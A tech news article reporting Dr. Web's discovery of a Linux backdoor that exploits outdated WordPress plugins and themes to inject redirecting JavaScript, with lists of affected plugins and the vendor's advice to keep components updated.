Monday, May 29, 2023
  • Events
  • Interviews
  • Jobs
  • Opinion
  • Whitepapers
  • Podcasts
  • Web Hosting Directory
  • Login
  • Register
Cloud7
  • Cloud Computing
  • Web Hosting
  • Data Center
  • Linux
  • Cybersecurity
  • More
    • Software
    • Network/Internet
    • Hardware
    • Artificial Intelligence
    • Windows
    • Policy/Legislation
    • Blockchain
    • Troubleshooting
    • How-Tos
    • Articles
No Result
View All Result
Cloud7
  • Cloud Computing
  • Web Hosting
  • Data Center
  • Linux
  • Cybersecurity
  • More
    • Software
    • Network/Internet
    • Hardware
    • Artificial Intelligence
    • Windows
    • Policy/Legislation
    • Blockchain
    • Troubleshooting
    • How-Tos
    • Articles
No Result
View All Result
Cloud7
No Result
View All Result

Home > Cybersecurity > A new Linux malware exploits outdated WordPress plugins

A new Linux malware exploits outdated WordPress plugins

Dr. Web announced that they have discovered a new Linux malware that targets 32-bit and 64-bit Linux systems.


Erdem Yasar Erdem Yasar
January 4, 2023
3 min read
A new Linux malware exploits outdated WordPress plugins
  • Researchers at Dr. Web announced that they have discovered a trojan that exploits outdated WordPress plugins and themes.
  • The malware gets malicious JavaScript from a command and control server and injects the script into the website.
  • Dr. Web found two versions of the trojan, which is probably being used by hackers for the last three years.

Antivirus vendor Dr. Web published a new report regarding a new Linux malware, which uses vulnerabilities in outdated WordPress plugins and themes to inject malicious JavaScript. The malware targets Linux systems and provides remote command capabilities to its operator. The malware exploits 30 vulnerabilities in those plugins and themes. 

Linux.BackDoor.WordPressExploit.1

Dr. Web has named the malware Linux.BackDoor.WordPressExploit.1 in accordance with its antivirus classification. According to the report, upon the operator’s command, it can perform:

  • Attack a specified webpage (website)
  • Switch to standby mode
  • Shut itself down
  • Pause logging its actions

Experts also claimed that cybercriminals have been using it for more than three years to carry out attacks and monetize the resale of traffic, or arbitrage. First, the trojan contacts the C&C server to receive the address of the site to infect. Then it tried to exploit vulnerabilities in the following outdated plugins and themes that can be installed on a website:

  • WP Live Chat Support Plugin
  • WordPress – Yuzo Related Posts
  • Yellow Pencil Visual Theme Customizer Plugin
  • Easysmtp
  • WP GDPR Compliance Plugin
  • Newspaper Theme on WordPress Access Control 
  • Thim Core
  • Google Code Inserter
  • Total Donations Plugin
  • Post Custom Templates Lite
  • WP Quick Booking Manager
  • Faceboor Live Chat by Zotabox
  • Blog Designer WordPress Plugin
  • WordPress Ultimate FAQ
  • WP-Matomo Integration 
  • WordPress ND Shortcodes For Visual Composer
  • WP Live Chat
  • Coming Soon Page and Maintenance Mode
  • Hybrid

Once it exploits one of the vulnerabilities found in these plugins and themes, it injects the page with malicious JavaScript, which is downloaded from a remote server. When the page is loaded, this JavaScript is initiated first and whenever a user clicks anywhere on the infected page, they will be transferred to a website, which is chosen by the attacker. It also collects statistics and tracks the overall number of websites attacked.

Dr. Web researchers also found an updated version of the trojan and named it Linux.BackDoor.WordPressExploit.2. The differences between the two versions are the C&C server address, the address of the domain from which the malicious JavaScript is downloaded, and an additional list of exploited vulnerabilities for the following plugins:

  • Brizy WordPress Plugin
  • FV Flowplayer Video Player
  • WooCommerce
  • WordPress Coming Soon Page
  • WordPress theme OneTone
  • Simple Fields WordPress Plugin
  • WordPress Delucks SEO plugin
  • Poll, Survey, Form & Quiz Maker by OpinionStage
  • Social Metrics Tracker
  • WPeMatico RSS Feed Fetcher
  • Rich Reviews plugin

Dr. Web said,

« With that, both trojan variants have been found to contain unimplemented functionality for hacking the administrator accounts of targeted websites through a brute-force attack, by applying known logins and passwords, using special vocabularies. It is possible that this functionality was present in earlier modifications, or, conversely, that attackers plan to use it for future versions of this malware. If such an option is implemented in newer versions of the backdoor, cybercriminals will even be able to successfully attack some of those websites that use current plugin versions with patched vulnerabilities.

Doctor Web recommends that owners of WordPress-based websites keep all the components of the platform up-to-date, including third-party add-ons and themes, and also use strong and unique logins and passwords for their accounts. »

See more Cybersecurity News

A comprehensive guide to understanding Cybersecurity: What is Cybersecurity?


Tags: LinuxWordPress
Erdem Yasar

Erdem Yasar

Erdem Yasar is a news editor at Cloud7. Erdem started his career by writing video game reviews in 2007 for PC World magazine while he was studying computer engineering. In the following years, he focused on software development with various programming languages. After his graduation, he continued to work as an editor for several major tech-related websites and magazines. During the 2010s, Erdem Yasar shifted his focus to cloud computing, hosting, and data centers as they were becoming more popular topics in the tech industry. Erdem Yasar also worked with various industry-leading tech companies as a content creator by writing blog posts and other articles. Prior to his role at Cloud7, Erdem was the managing editor of T3 Magazine.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

I agree to the Terms & Conditions and Privacy Policy.

Next Post

Netgear urged users to patch a router vulnerability

Related News

ChatGPT brings concerns about cybersecurity and search engine rankings

ChatGPT brings concerns about cybersecurity and search engine rankings

May 5, 2023 6:00 pm
Ransomware: Paying the price twice

Ransomware: Paying the price twice

May 5, 2023 4:00 pm
CISA adds 3 more vulnerabilities to its catalogue

CISA adds 3 more vulnerabilities to its catalogue

May 2, 2023 4:20 pm
FIN7 attacks vulnerable Veeam servers

FIN7 attacks vulnerable Veeam servers

May 1, 2023 5:31 pm
Get free daily newsletters from Cloud7 Get the Cloud7 Newsletter
Select list(s):

Check your inbox or spam folder to confirm your subscription.

By subscribing, you agree to our
Copyright Policy and Privacy Policy

Editor's Choice

10 best web hosting services

7 best shared hosting service providers

7 best Linux distros for beginners

7 best Linux distros for gaming

7 best cloud storage services for business

7 best Linux desktop environments

Farewell and gratitude: The journey ends for Cloud7

Get the free newsletter

Subscribe to receive the latest IT business updates straight to your inbox.

Select list(s):

Check your inbox or spam folder to confirm your subscription.

Recent News

  • Farewell and gratitude: The journey ends for Cloud7
  • Gcore Partners with Pienso
  • LibreOffice 7.4.7 is now available for download
  • AI-powered automatic time tracking (Podcast #20 w/ Catalina Butnaru)
  • Best file managers for Linux
  • EuroLinux 9.2 is now available for download
  • X3D, or not X3D, that is the question

Cloud7 News
Cloud7 is a news source that publishes the latest news, reviews, comparisons, opinions, and exclusive interviews to help tech users of high-experience levels in the IT industry.

EXPLORE

  • Web Hosting
  • Cloud Computing
  • Data Center
  • Cybersecurity
  • Linux
  • Network/Internet
  • Software
  • Hardware
  • Artificial Intelligence
  • How-Tos
  • Troubleshooting

RESOURCES

  • Events
  • Interviews
  • Jobs
  • Opinion
  • Whitepapers
  • Podcasts
  • Web Hosting Directory

Get the Cloud7 Newsletter

Get FREE daily newsletters from Cloud7 delivering the latest news and reviews.

  • About Us
  • Privacy & Policy
  • Copyright Policy
  • Contact Us

© 2023, Cloud7. All rights reserved.

No Result
View All Result
  • Cloud Computing
  • Web Hosting
  • Data Center
  • Linux
  • Cybersecurity
  • More
    • Software
    • Network/Internet
    • Hardware
    • Artificial Intelligence
    • Windows
    • Policy/Legislation
    • Blockchain
    • Troubleshooting
    • How-Tos
    • Articles
  • Events
  • Interviews
  • Jobs
  • Opinion
  • Whitepapers
  • Podcasts
  • Web Hosting Directory

© 2023, Cloud7. All rights reserved.

Welcome Back!

Sign In with Facebook
Sign In with Google
Sign In with Linked In
OR

Login to your account below

Forgotten Password? Sign Up

Create New Account!

Sign Up with Facebook
Sign Up with Google
Sign Up with Linked In
OR

Fill the forms below to register

*By registering into our website, you agree to the Terms & Conditions and Privacy Policy.
All fields are required. Log In

Retrieve your password

Please enter your username or email address to reset your password.

Log In

Add New Playlist

This website uses cookies. By continuing to use this website you are giving consent to cookies being used. Visit our Privacy and Cookie Policy.